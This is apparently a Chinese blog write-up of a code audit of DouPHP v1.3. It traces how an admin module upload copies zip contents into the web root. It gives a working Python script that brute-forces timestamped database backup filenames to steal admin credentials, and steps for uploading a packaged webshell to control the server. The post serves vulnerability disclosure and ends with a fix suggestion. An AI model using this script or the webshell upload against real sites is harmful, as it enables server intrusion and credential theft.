【代码审计】DouPHP_v1.3代码执行漏洞分析
0x00 环境准备
DouPHP官网:http://www.douco.com/
程序源码下载:http://down.douco.com/DouPHP_1.3_Release_20171002.rar
测试网站首页:
0x01 代码分析
1、文件位置: /admin/module.php 第64-77行中:
- if ($rec == 'install') {
- // 判断是否有上传文件
- if ($_FILES['zipfile']['name'] == '') {
- $dou->dou_msg($_LANG['module_file_empty'], 'module.php?rec=local');
- } else {
- $zipfile_name = preg_replace('/.zip/i', '', $_FILES['zipfile']['name']);
- }
- // CSRF防御令牌验证
- 10. $firewall->check_token($_POST['token']);
- 11.
- 12. if ($dou_upload->upload_image('zipfile', $zipfile_name))
- 13. $dou->dou_header('cloud.php?rec=handle&type=module&mode=local&cloud_id=' . $zipfile_name);
14. }
这段函数中对上传的文件名进行判断,然后成功上传文件,跳转到cloud.php?rec=handle&type=module&mode=local&cloud_id=,跟进这个模块,看如何处理的
2、文件位置: /admin/cloud.php 第35-49行中,对上面获取的参数进行处理,调用handle函数,跟进去看看:
- if ($rec == 'handle') {
- $smarty->assign('ur_here', $_LANG['cloud_handle']);
- // 验证并获取合法的ID
- $cloud_id = $check->is_extend_id($_REQUEST['cloud_id']) ? $_REQUEST['cloud_id'] : '';
- $type = $_REQUEST['type'];
- $mode = $check->is_letter($_REQUEST['mode']) ? $_REQUEST['mode'] : '';
- $smarty->assign('type', $_LANG['cloud_' . $type]);
- 10. $smarty->assign('cloud_id', $cloud_id);
- 11. $smarty->assign('mode', $mode);
- 12.
- 13. $smarty->display('cloud.htm');
- 14. $GLOBALS['dou_cloud']->handle($type, $cloud_id, $mode);
15. }
3、文件位置/admin/include/cloud.class.php,第40-103行中,对handle函数进行部分摘录,前面几步STEP基本没问题,我们来看一下STEP4,调用了install函数,跟进去看看:
- function handle($type, $cloud_id, $mode = '') {
- // 基础数据
- $item_zip = $this->cache_dir . $cloud_id . '.zip'; // 扩展压缩包
- $item_dir = $this->cache_dir . $cloud_id; // 扩展目录
- '''
- // STEP1 安装条件验证
- // STEP2 下载压缩包,如果是本地安装则直接显示正在解压缩
- // STEP3 解压缩
- ''''
- 10. // STEP4 安装模块
- 11. if ($wrong = $this->install($type, $cloud_id, $mode)) {
- 12. $this->dou_flush($wrong);
- 13. exit;
- 14. } else {
- 15. $text = $mode == 'update' ? $GLOBALS['_LANG']['cloud_update_0'] : $GLOBALS['_LANG']['cloud_install_0'];
- 16. $success[] = $text . $cloud_id . $GLOBALS['_LANG']['cloud_install_1'];
- 17. $success[] = $this->msg_success($type, $cloud_id);
- 18.
- 19. $this->dou_flush($success);
- 20. }
- 21. }
4、文件位置/admin/include/cloud.class.php,第115-133行:
- function install($type, $cloud_id, $mode) {
- global $prefix;
- // 基础数据
- $item_zip = $this->cache_dir . $cloud_id . '.zip'; // 模块压缩包
- $item_dir = $this->cache_dir . $cloud_id; // 模块目录
- $sql_install = $this->root_dir . "data/backup/$cloud_id.sql"; // 安装用的SQL文件
- $sql_update = $this->root_dir . "data/backup/$cloud_id" . "_update.sql"; // 升级用的SQL文件
- 10. // STEP1 拷贝模块文件
- 11. if ($type == 'theme') {
- 12. $this->dir_action($item_dir, $this->root_dir . 'theme/' . $cloud_id);
- 13. } elseif ($type == 'mobile') {
- 14. $this->dir_action($item_dir, $this->root_dir . M_PATH . '/theme/' . $cloud_id);
- 15. } elseif ($type == 'plugin') {
- 16. $this->dir_action($item_dir, $this->root_dir . 'include/plugin/' . $cloud_id);
- 17. } else {
- 18. $this->dir_action($item_dir, $this->root_dir);
- 19. }
最后的安装模块过程中,首页就是拷贝模块文件,因$type=module,只能进入最后一个条件,也就是复制解压缩目录下的文件到网站根目录下,导致程序在实现上存在代码执行漏洞。
综上,对所上传的zip文件名只进行简单判断,然后解压缩、安装,当攻击者提供带入恶意代码的脚本,打包为zip文件上传,将被复制到网站根目录,通过该漏洞写入webshell,执行代码,控制服务器权限。
0x02 漏洞利用
A、 如何登陆后台
1、在DouPHP中备份功能代码摘录如下:
- // 根据时间生成备份文件名
- $file_name = 'D' . date('Ymd') . 'T' . date('His');
- $sql_file_name = $file_name . '.sql';
2、那么形成的文件名格式如:D20180118T101433.sql,而且URL访问并没有限制,备份目录是可以访问的,存在敏感信息泄露的风险。
假如管理员做了数据库备份,那么就可以爆破数据库备份文件获取敏感信息。
通过编写Python脚本来尝试爆破,附Python脚本如下:
- #! /usr/bin/env python
- # _*_ coding:utf-8 _*_
- import time
- import requests
- import threadpool
- date= "2018-01-18 10:00:00"
- datelist=[]
10. def gettime():
- 11. timeArray = time.strptime(date,"%Y-%m-%d %H:%M:%S")
- 12. time1= int(time.mktime(timeArray))
- 13. time2=int(time.time())
- 14. for i in range(time1,time2):
- 15. time3= time.strftime('%Y%m%d %H%M%S', time.localtime(i))
- 16. datelist.append(time3)
- 17. return datelist
18. def req(str):
- 19. try:
- 20. str1,str2=str.split()
- 21. date1="D"+str1+"T"+str2
- 22. url="http://127.0.0.1/data/backup/"+date1+".sql"
- 23. s=requests.get(url,timeout=5)
- 24. if s.status_code==200:
- 25. print u"数据库备份文件爆破成功:"
- 26. print url
- 27.
- 28. except:
- 29. pass
- 30.
31. if __name__ == '__main__':
- 32. list=gettime()
- 33. pool = threadpool.ThreadPool(1000)
- 34. requ = threadpool.makeRequests(req,list)
- 35. [pool.putRequest(req) for req in requ]
- 36. pool.wait()
- 37.
3、测试截图:
4、通过URL访问数据库备份文件,获取管理员账号密码。当然了,也可以尝试通过弱口令登录后台。
B、代码执行漏洞利用
1、将一句话打包为zip文件,在安装本地模块,点击现在安装,即可成功上传,
2、程序自动解压jian.zip到网站根目录下,生成jian.php
3、通过菜刀连接,成功控制网站服务器
0x03 修复建议
1、对上传的zip文件内容进行检测,对模块文件内容格式进行严格限制。
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
【代码审计】DouPHP_v1.3代码执行漏洞分析相关推荐
- Nette框架未授权任意代码执行漏洞分析
Nette框架未授权任意代码执行漏洞分析 漏洞介绍: Nette Framework 是个强大,基于组件的事件驱动 PHP 框架,用来创建 web 应用.Nette Framework 是个现代化风格 ...
- Joomla远程代码执行漏洞分析小白版(小宇特详解)
Joomla远程代码执行漏洞分析小白版(小宇特详解) 今天看了一下2021陇原战役WP,在看web方向的时候,看到pop链,想了解一下,后来又看到了p师傅在15年的一篇文章,在这里记录一下.这里主要是 ...
- 【代码审计】CmsEasy_v5.7 代码执行漏洞分析
0x00 环境准备 CmsEasy官网:http://www.cmseasy.cn/ 网站源码版本:CmsEasy_v5.7_UTF8-0208 程序源码下载: http://ftp.cmseas ...
- cve-2019-1821 思科 Cisco Prime 企业局域网管理器 远程代码执行 漏洞分析
前言 不是所有目录遍历漏洞危害都相同,取决于遍历的用法以及用户交互程度.正如你将看到,本文的这个漏洞类在代码中非常难发现,但可以造成巨大的影响. 这个漏洞存在于思科Prime Infrastructu ...
- goahead处理json_GoAhead Web Server远程代码执行漏洞分析(附PoC)
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 本文是关于GoAhead web server远程代码执行漏洞(CVE-2017- ...
- ecshop 解密index.php,ECShop 2.x 3.0代码执行漏洞分析
0x00 前言 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店.2.x版本跟3.0版本存在代码执行漏洞. 0x01 漏洞原理 ECShop 没有对 $GLOBAL['_SE ...
- wordpress 5.0.0 远程代码执行漏洞分析cve-2019-8943
近日,wordpress发布一个安全升级补丁,修复了一个WordPress核心中的远程代码执行漏洞.代码修改细节可以参考wordpress团队于Dec 13, 2018提交的代码.据漏洞披露者文中所介 ...
- php excel中解析显示html代码_骑士cms从任意文件包含到远程代码执行漏洞分析
前言 前些日子,骑士cms 官方公布了一个系统紧急风险漏洞升级通知:骑士cms 6.0.48存在一处任意文件包含漏洞,利用该漏洞对payload文件进行包含,即可造成远程代码执行漏洞.这篇文章将从漏洞 ...
- CVE-2012-1876Microsoft Internet Explorer Col元素远程代码执行漏洞分析
Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器. Microsoft Internet Explorer 6至9版本中存在漏 ...
最新文章
- 拯救尴尬:鉴黄神器NSFW JS开源了!
- Android中的Dialog
- 说了这么多次 I/O,可你知道其中的原理么
- Nodejs学习笔记(四)——http协议与服务器
- Android什么时候用抽象类什么时候用接口
- Android OpenGL ES(六)创建实例应用OpenGLDemos程序框架 .
- 【linux】修改某一行
- 虚拟机系统iso镜像下载_[原版镜像]macOS Mojave 10.14.1 原版 iso 镜像- 虚拟机专用
- 萌新的51之旅——红外通信
- hp 计算机如何显示在桌面上,HPDL1414 精致桌面小伴侣 显示时间日历和电脑状态(CPU温度负载...
- java找不到符号解决办法
- PySpark---SparkSQL中的DataFrame(一)
- 思科模拟器中配置单区域OSPF
- Flutter组件学习(13)层叠布局Stack、Positioned
- java 获取token
- newman执行测试_newman执行postman脚本
- dingding钉钉 python接口
- 【C语言学习04】跳出嵌套循环
- Python离线安装包教程
- Fixcel电子表单——表单设计器